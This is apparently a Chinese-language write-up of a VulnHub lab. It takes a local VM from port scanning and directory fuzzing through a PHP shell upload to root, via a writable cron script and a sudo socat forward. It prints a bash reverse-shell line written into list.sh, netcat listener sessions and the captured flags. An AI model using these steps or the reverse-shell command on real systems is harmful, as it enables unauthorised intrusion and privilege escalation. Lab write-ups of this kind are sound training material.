目录
信息收集
arp
nmap
nikto
whatweb
WEB
信息收集
dirmap
提权
系统信息收集
横向提权
get root
信息收集
arp
┌──(root㉿ru)-[~/kali/vulnhub] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:50:56:2f:dd:99, IPv4: 192.168.211.128 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.211.1 00:50:56:c0:00:08 VMware, Inc. 192.168.211.2 00:50:56:e6:61:4b VMware, Inc. 192.168.211.135 00:50:56:21:cf:ed VMware, Inc. 192.168.211.254 00:50:56:f0:b5:b8 VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.495 seconds (102.61 hosts/sec). 4 responded
nmap
端口扫描 ┌──(root㉿ru)-[~/kali/vulnhub] └─# nmap -p- 192.168.211.135 --min-rate 10000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 13:59 CST Nmap scan report for 192.168.211.135 Host is up (0.0036s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http MAC Address: 00:50:56:21:CF:ED (VMware) Nmap done: 1 IP address (1 host up) scanned in 8.05 seconds
版本服务探测 ┌──(root㉿ru)-[~/kali/vulnhub] └─# nmap -sC -sV -O -p 80 192.168.211.135 --min-rate 10000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 14:00 CST Nmap scan report for 192.168.211.135 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Freelancer - Start Bootstrap Theme MAC Address: 00:50:56:21:CF:ED (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds
nikto
┌──(root㉿ru)-[~/kali/vulnhub] └─# nikto -h http://192.168.211.135/ - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.211.135 + Target Hostname: 192.168.211.135 + Target Port: 80 + Start Time: 2024-04-08 15:47:27 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.38 (Debian) + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + /: Server may leak inodes via ETags, header found with file /, inode: 6a7f, size: 5af24a0184072, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 + OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET . + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/ + 8102 requests: 0 error(s) and 6 item(s) reported on remote host + End Time: 2024-04-08 15:47:53 (GMT8) (26 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
whatweb
┌──(root㉿ru)-[~/kali/vulnhub] └─# whatweb -v http://192.168.211.135/ WhatWeb report for http://192.168.211.135/ Status : 200 OK Title : Freelancer - Start Bootstrap Theme IP : 192.168.211.135 Country : RESERVED, ZZ Summary : Apache[2.4.38], Bootstrap, HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], JQuery, Script, X-UA-Compatible[IE=edge] Detected Plugins: [ Apache ] The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.4.38 (from HTTP Server Header) Google Dorks: (3) Website : http://httpd.apache.org/ [ Bootstrap ] Bootstrap is an open source toolkit for developing with HTML, CSS, and JS. Website : https://getbootstrap.com/ [ HTML5 ] HTML version 5, detected by the doctype declaration [ HTTPServer ] HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Debian Linux String : Apache/2.4.38 (Debian) (from server string) [ JQuery ] A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/ [ Script ] This plugin detects instances of script HTML elements and returns the script language/type. [ X-UA-Compatible ] This plugin retrieves the X-UA-Compatible value from the HTTP header and meta http-equiv tag. - More Info: http://msdn.microsoft.com/en-us/library/cc817574.aspx String : IE=edge HTTP Headers: HTTP/1.1 200 OK Date: Mon, 08 Apr 2024 07:33:10 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Sat, 12 Sep 2020 21:38:43 GMT ETag: "6a7f-5af24a0184072-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3377 Connection: close Content-Type: text/html
WEB
信息收集
dirmap
┌──(root㉿ru)-[~/tools/dirscan/dirmap]
└─# python3 dirmap.py -i http://192.168.211.135/ -lcf
##### # ##### # # ## #####
# # # # # ## ## # # # #
# # # # # # ## # # # # #
# # # ##### # # ###### #####
# # # # # # # # # #
##### # # # # # # # # v1.0
[*] Initialize targets...
[+] Load targets from: http://192.168.211.135/
[+] Set the number of thread: 30
[+] Coroutine mode
[+] Current target: http://192.168.211.135/
[*] Launching auto check 404
[+] Checking with: http://192.168.211.135/ccjimqtouvulxwpfqmepgsutmqaakqkggbqjpmlnko
[*] Use recursive scan: No
[*] Use dict mode
[+] Load dict:/root/tools/dirscan/dirmap/data/dict_mode_dict.txt
[*] Use crawl mode
[200][text/html][3.30kb] http://192.168.211.135/index.html
[200][text/Markdown][278.00b] http://192.168.211.135/readme.md
[200][text/html][588.00b] http://192.168.211.135/upload/
[200][text/html; charset=UTF-8][500.00b] http://192.168.211.135/upload/upload.php
[200][text/html][3.30kb] http://192.168.211.135/
[200][application/javascript][906.00b] http://192.168.211.135/js/contact_me.js
[200][image/png][18.79kb] http://192.168.211.135/img/portfolio/safe.png
[200][image/png][10.04kb] http://192.168.211.135/img/profile.png
[200][text/css][4.92kb] http://192.168.211.135/font-awesome/css/font-awesome.min.css
[200][application/javascript][32.45kb] http://192.168.211.135/js/jquery.js
[200][image/png][23.76kb] http://192.168.211.135/img/portfolio/submarine.png
[200][application/javascript][680.00b] http://192.168.211.135/js/classie.js
[200][image/png][27.33kb] http://192.168.211.135/img/portfolio/circus.png
[200][text/css][1.82kb] http://192.168.211.135/css/freelancer.css
[200][image/png][16.67kb] http://192.168.211.135/img/portfolio/cake.png
[200][image/png][25.29kb] http://192.168.211.135/img/portfolio/game.png
[200][application/javascript][622.00b] http://192.168.211.135/js/freelancer.js
[200][text/css][18.91kb] http://192.168.211.135/css/bootstrap.min.css
[200][image/png][35.66kb] http://192.168.211.135/img/portfolio/cabin.png
[200][application/javascript][9.19kb] http://192.168.211.135/js/bootstrap.min.js
99% (6600 of 6618) |################################################### | Elapsed Time: 0:00:13 ETA: 0:00:00
看来就是文件上传了!
文件上传
虽然上传成功了,但是不知道上传到哪了!我们再次进行目录检索!
┌──(root㉿ru)-[~/kali/vulnhub] └─# wfuzz -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -u http://192.168.211.135/upload/FUZZ -t 100 --hc 404,403 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.211.135/upload/FUZZ Total requests: 17770 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000055: 301 9 L 28 W 325 Ch "files" 000003809: 200 31 L 85 W 903 Ch "http://192.168.211.135/upload/"
经过fuzz,发现files路径!
┌──(root?ru)-[~/kali/vulnhub] └─# nc -lvvp 1234 listening on [any] 1234 ... 192.168.211.135: inverse host lookup failed: Unknown host connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 60876 Linux 32064e9210cb 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux 08:09:12 up 22 min, 0 users, load average: 0.01, 0.87, 0.85 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $
提权
系统信息收集
$ find / -perm -u=s -type f 2>/dev/null /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/passwd /usr/bin/gpasswd /bin/mount /bin/umount /bin/su
$ ls -al /var/www/html total 88 drwxr-xr-x 11 root root 4096 Sep 12 2020 . drwxr-xr-x 1 root root 4096 Sep 10 2020 .. drwxrwxrwx 2 root 1000 4096 Apr 8 2024 Maintenance-Web-Docker drwxr-xr-x 2 root root 4096 Sep 12 2020 css drwxr-xr-x 6 root root 4096 Sep 12 2020 font-awesome drwxr-xr-x 2 root root 4096 Sep 12 2020 fonts drwxr-xr-x 3 root root 4096 Sep 12 2020 img -rw-r--r-- 1 root root 27263 Sep 12 2020 index.html drwxr-xr-x 2 root root 4096 Sep 12 2020 js drwxr-xr-x 2 root root 4096 Sep 12 2020 less -rw-r--r-- 1 root root 11336 Sep 12 2020 license drwxr-xr-x 2 root root 4096 Sep 12 2020 mail -rw-r--r-- 1 root root 278 Sep 12 2020 readme.md drwxr-xr-x 3 root root 4096 Sep 12 2020 upload
$ ls -al total 24 drwxrwxrwx 2 root 1000 4096 Apr 8 2024 . drwxr-xr-x 11 root root 4096 Sep 12 2020 .. -rwxrwxrwx 1 root root 164 Sep 13 2020 list.sh -rwxr-xr-x 1 root root 204 Sep 12 2020 maintenance.sh -rw-r--r-- 1 1000 1000 5066 Apr 8 08:42 out.txt $ cat list.sh #!/bin/bash date >> /home/richard/web/Maintenance-Web-Docker/out.txt ls /home/richard/web/upload/files/ | wc -l >> /home/richard/web/Maintenance-Web-Docker/out.txt
$ date Mon Apr 8 08:43:20 UTC 2024 这些命令的作用是将当前日期追加到文件 /home/richard/web/Maintenance-Web-Docker/out.txt 中,然后统计目录 /home/richard/web/upload/files/ 中文件的数量,并将数量追加到同一文件中。 list.sh是可读可写可执行的!我们利用一下!
横向提权
echo "/bin/bash -c 'bash -i>& /dev/tcp/192.168.211.128/7878 0>&1'" > list.sh
richard@EC2:~$ ls ls HackTools user.txt web richard@EC2:~$ cat user.txt cat user.txt 3a6b99f59ea363803bcafc7f5dd9b1e8 richard@EC2:~$
richard@EC2:~/HackTools$ sudo -l
sudo -l
Matching Defaults entries for richard on EC2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User richard may run the following commands on EC2:
(ALL) NOPASSWD: /home/richard/HackTools/socat TCP-LISTEN\:8080\,fork
TCP\:127.0.0.1\:90
richard@EC2:~/HackTools$
/home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90
我们使用sudo运行!
果然开放了新的端口!
信息泄露
经过测试,存在信息泄露漏洞!这个服务是以root权限运行的,我们可以执行我们之前上传的payload即可拿到root权限的shell! 上传路径 /home/richard/web/uplaod/files/shell.php
get root
┌──(root?ru)-[~/tools/dirscan/dirmap]
└─# nc -lvvp 2345
listening on [any] 2345 ...
192.168.211.135: inverse host lookup failed: Unknown host
connect to [192.168.211.128] from (UNKNOWN) [192.168.211.135] 42992
Linux EC2 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
05:06:55 up 32 min, 0 users, load average: 6.43, 6.14, 4.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
proof.txt
# cat proof.txt
_ _ _ _ _ _
| | | | | | | | | | |
| | | | ___| | | __| | ___ _ __ ___| |
| |/\| |/ _ \ | | / _` |/ _ \| '_ \ / _ \ |
\ /\ / __/ | | | (_| | (_) | | | | __/_|
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___(_)
07f61ca07bc617f9639b412423b2cc6f
Twitter: @0x04E1
#
